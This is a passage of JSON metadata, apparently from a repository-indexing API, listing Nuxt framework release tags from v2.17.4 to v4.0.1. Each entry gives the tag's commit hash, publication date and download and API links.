nuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v